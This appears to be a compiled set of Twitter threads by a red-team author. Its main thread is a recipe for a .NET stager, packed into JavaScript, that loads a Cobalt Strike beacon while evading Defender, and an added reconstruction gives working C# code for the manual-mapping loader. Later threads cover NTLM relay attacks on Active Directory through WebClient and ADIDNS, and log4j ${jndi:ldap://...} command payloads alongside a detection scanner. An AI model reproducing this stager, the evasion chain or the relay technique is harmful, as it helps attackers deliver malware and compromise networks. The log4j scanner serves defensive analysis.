an0n (@an0n_r0), Jun 11, 9 tweets
Built a special JS stager for Cobalt Strike (or for anything else).

Actually it is based on C# .NET, and it is super simple (the full source was in the screenshot) because it uses the PE mapper from DInvoke.

Currently it bypasses Defender.

Sharing some details in this thread.
First, I started from a stageless Cobalt Strike beacon payload generated using my custom Artifact Kit, already including some advanced evasion features that I didn't want to rewrite again.

That's why I turned to PE staging instead of the common shellcode loading technique.
Luckily, DInvoke (besides other super features) supports manual PE mapping of unmanaged code from managed .NET projects out-of-the-box.

thewover.github.io/Dynamic-Invoke/

The only difficulty in using DInvoke is that it is flagged by most AV products.
My final goal was to create a JS initial payload. This is where GadgetToJScript comes into the picture.

github.com/med0x2e/Gadget…

It is an awesome tool for building JS payloads from .NET assemblies, but there were issues with packaging the stager assembly and the DInvoke module together.
What worked for me after a long trial-and-error process: using ILMerge to link the SimpleStager.exe and DInvoke.dll assemblies together.

github.com/dotnet/ILMerge

Other solutions (Costura.Fody or the ConfuserEx compressor) failed in the GadgetToJScript deserialization phase.
After merging the assemblies, I applied ConfuserEx 2 for obfuscation to make the AV's job harder.

mkaring.github.io/ConfuserEx/

I had to play with various features (which to enable and which not) to make GadgetToJScript deserialization work (and keep AV happy at the same time :) ).
Finally, the SimpleStager with DInvoke, merged with ILMerge, obfuscated with ConfuserEx 2, and packed into JS with GadgetToJScript, bypassed Defender with my Cobalt Strike stageless DLL payload (of course built with the custom Artifact Kit, including advanced evasion features).
As a side note, for GadgetToJScript against Defender, a basic tweak to the default template was needed. Nothing fancy, just a slight modification. :)

Last note: for convenience, the whole build process could be automated by adding NuGet packages and/or including the dependent projects and adding the appropriate configuration in the Visual Studio solution.
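The thread's stager source was only shown in a screenshot, so here is an added reconstruction (not the author's code) of the DInvoke manual-mapping pattern the thread relies on. It follows DInvoke's documented API: Map.MapModuleToMemory maps an unmanaged PE from a byte array without LoadLibrary, and Generic.CallMappedDLLModuleExport runs an export from the mapped image. Assumptions: DInvoke.dll is referenced (and later merged in with ILMerge as the thread describes), the payload path comes from the command line, and the export name "Start" and its no-argument signature are placeholders for whatever the real payload DLL exports.

```csharp
// Added example: minimal .NET stager that manually maps an unmanaged DLL with
// DInvoke and calls one of its exports. Not the thread's original source.
// Assumes a reference to DInvoke.dll; "Start" and StartDelegate are placeholders.
using System;
using System.IO;
using System.Runtime.InteropServices;
using DInvoke.Data;
using DInvoke.DynamicInvoke;
using DInvoke.ManualMap;

namespace SimpleStager
{
    class Program
    {
        // Placeholder delegate for the payload's export; adjust the signature
        // to match the real export of the DLL being staged.
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        delegate void StartDelegate();

        static void Main(string[] args)
        {
            if (args.Length < 1 || !File.Exists(args[0]))
            {
                Console.Error.WriteLine("usage: SimpleStager <payload.dll>");
                return;
            }

            // Read the unmanaged PE into managed memory; nothing is written to disk
            // afterwards and LoadLibrary is never called on it.
            byte[] dll = File.ReadAllBytes(args[0]);

            // DInvoke manual map: allocates the image, copies sections, applies
            // relocations and resolves imports (DInvoke's documented entry point).
            PE.PE_MANUAL_MAP map = Map.MapModuleToMemory(dll);

            // Invoke the export through the mapped image. CallEntry = true makes
            // DInvoke run the DLL's entry point (DllMain) before the export.
            Generic.CallMappedDLLModuleExport(map, "Start", typeof(StartDelegate),
                                              new object[] { }, true);
        }
    }
}
```

Because the PE is mapped by DInvoke rather than the loader, the image never appears in the process's module list, which is the property the thread trades on; the flip side, as the thread notes, is that DInvoke itself is widely signatured, hence the ILMerge plus ConfuserEx steps before GadgetToJScript.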

More from @an0n_r0

Jan 22
If NetNTLMv1 is disabled but LDAP signing is not enforced on the DC, and the WebClient service is enabled on the target, the pwn is similar (~RBCD abuse). The NTLM relay should be HTTP->LDAP instead of SMB->LDAP (WebClient does not set the signature requirement on the client side).
The WebDAV target for coerced NTLM auth should be a dotless hostname (conforming to the Trusted/Intranet zone). No worries, an arbitrary hostname can be registered in ADIDNS even with a low-privileged domain account (using the dnstool script in krbrelayx).
And what if WebClient is installed but not running on the target? Startup is triggered when anyone opens a folder containing a searchConnector-ms file with an HTTP URL iconReference. 🙂
Aug 19, 2022
RDP logon with certificate: @_EthicalChaos_ is releasing a dedicated tool for this soon!

Until that, here is how I did this before (from Linux): simulating PIV applet on an emulated smartcard device locally and pass it through RDP. 🧵/1 👇
First component needed: vpcd frankmorgner.github.io/vsmartcard/vir…, a virtual smart card device, which actually emulates a software smart card reader in the PC/SC Smart Card Daemon. Just add vpcd to pcscd. 🧵/2 👇
Next step is inserting a proper smart card into the virtual smart card reader device. Simulating PIV with PivApplet: github.com/OpenSC/OpenSC/…, a Personal Identity Verification compatible JavaCard applet, running on jCardSim jcardsim.org 🧵/3 👇
Aug 17, 2022
If you want to browse the customer service locations of the Hungarian State Treasury on allamkincstar.gov.hu, it is good to have some basic #ReverseEngineering skills. 😉 #UXFail @AdobeFlash in 2022. Thread 1/🧵⬇️
It is relatively easy to navigate to a customer service selector page. According to the text, there should be a county chooser at the bottom, but there is nothing below. Let's see why. 2/🧵⬇️
In the source code we can see that the webpage includes a Flash (SWF) object. Yes, the county chooser of allamkincstar.gov.hu is a Flash object, even though it is 2022 and @AdobeFlash is EOL and support has been removed from browsers for over 1.5 years. 3/🧵⬇️
Dec 10, 2021
#log4j storm is coming, cryptominers in the first wave.

I checked multiple (non-Java ;) ) web servers I run, and the logs are filling up with ${jndi:ldap://...} payloads.

THREAD: let's see a weaponized one.
One common scheme is: ldap://host:port/Basic/Command/Base64/[base64encodedstring].

Some of the LDAP URLs are still accessible (usually only from targeted IPs; other IPs are firewalled). Fetching the LDAP data returns the JNDI object.
Unfortunately this javaCodeBase URL is offline at the moment, but the Base64-encoded part is simple bash, so the "foo" class should be a basic OS command launcher.
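A detection-side companion to the scheme above, added here and not part of the thread: pull ${jndi:...} lookups out of web server log lines and, where the URL follows the Basic/Command/Base64/<b64> layout, decode the command so an analyst can see what the first-wave loader would run. The log lines are constructed for illustration (RFC 5737 addresses, a "uname -a" payload); the regex handles only the plain ${jndi:...} form, not the nested-lookup obfuscations (${${lower:j}ndi:...}) seen in the wild.

```csharp
// Added example (not from the thread): scan log lines for JNDI lookups and
// decode the Basic/Command/Base64/<b64> form. Sample lines are constructed.
using System;
using System.Collections.Generic;
using System.Text;
using System.Text.RegularExpressions;

static class JndiScanner
{
    // Plain ${jndi:<url>} lookup; the URL runs up to the closing brace.
    static readonly Regex Jndi =
        new Regex(@"\$\{jndi:(?<url>[^}]+)\}", RegexOptions.IgnoreCase);

    // The command-launcher URL shape described in the thread.
    static readonly Regex B64Cmd = new Regex(
        @"^(?<scheme>ldaps?|rmi|dns)://(?<host>[^/:]+)(?::(?<port>\d+))?" +
        @"/Basic/Command/Base64/(?<b64>[A-Za-z0-9+/=]+)$",
        RegexOptions.IgnoreCase);

    // Yields one human-readable finding per JNDI lookup found in the input.
    public static IEnumerable<string> Scan(IEnumerable<string> lines)
    {
        foreach (string line in lines)
        {
            foreach (Match m in Jndi.Matches(line))
            {
                string url = m.Groups["url"].Value;
                Match c = B64Cmd.Match(url);
                if (!c.Success)
                {
                    yield return "JNDI lookup (uncategorised): " + url;
                    continue;
                }

                string cmd;
                try
                {
                    cmd = Encoding.UTF8.GetString(
                        Convert.FromBase64String(c.Groups["b64"].Value));
                }
                catch (FormatException)
                {
                    cmd = "<invalid base64>";
                }

                string port = c.Groups["port"].Success ? c.Groups["port"].Value : "?";
                yield return "callback " + c.Groups["host"].Value + ":" + port
                             + " cmd=" + cmd;
            }
        }
    }

    static void Main()
    {
        // Constructed sample access-log lines (payload in the path and in the User-Agent).
        string[] sample =
        {
            "192.0.2.10 - - [10/Dec/2021:12:00:01 +0000] \"GET /${jndi:ldap://198.51.100.7:1389/Basic/Command/Base64/dW5hbWUgLWE=} HTTP/1.1\" 404 153",
            "192.0.2.11 - - [10/Dec/2021:12:00:02 +0000] \"GET /index.html HTTP/1.1\" 200 612 \"-\" \"${jndi:ldap://198.51.100.7:1389/a}\"",
            "192.0.2.12 - - [10/Dec/2021:12:00:03 +0000] \"GET /robots.txt HTTP/1.1\" 200 24",
        };

        foreach (string hit in Scan(sample))
            Console.WriteLine(hit);
        // First line decodes to: callback 198.51.100.7:1389 cmd=uname -a
    }
}
```

The host:port pair is the indicator worth pivoting on: it is the attacker's LDAP listener, and as the thread notes it is often reachable only from the IPs that were targeted, so a scanner like this run over your own logs is usually the only way to recover the command without the live codebase.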
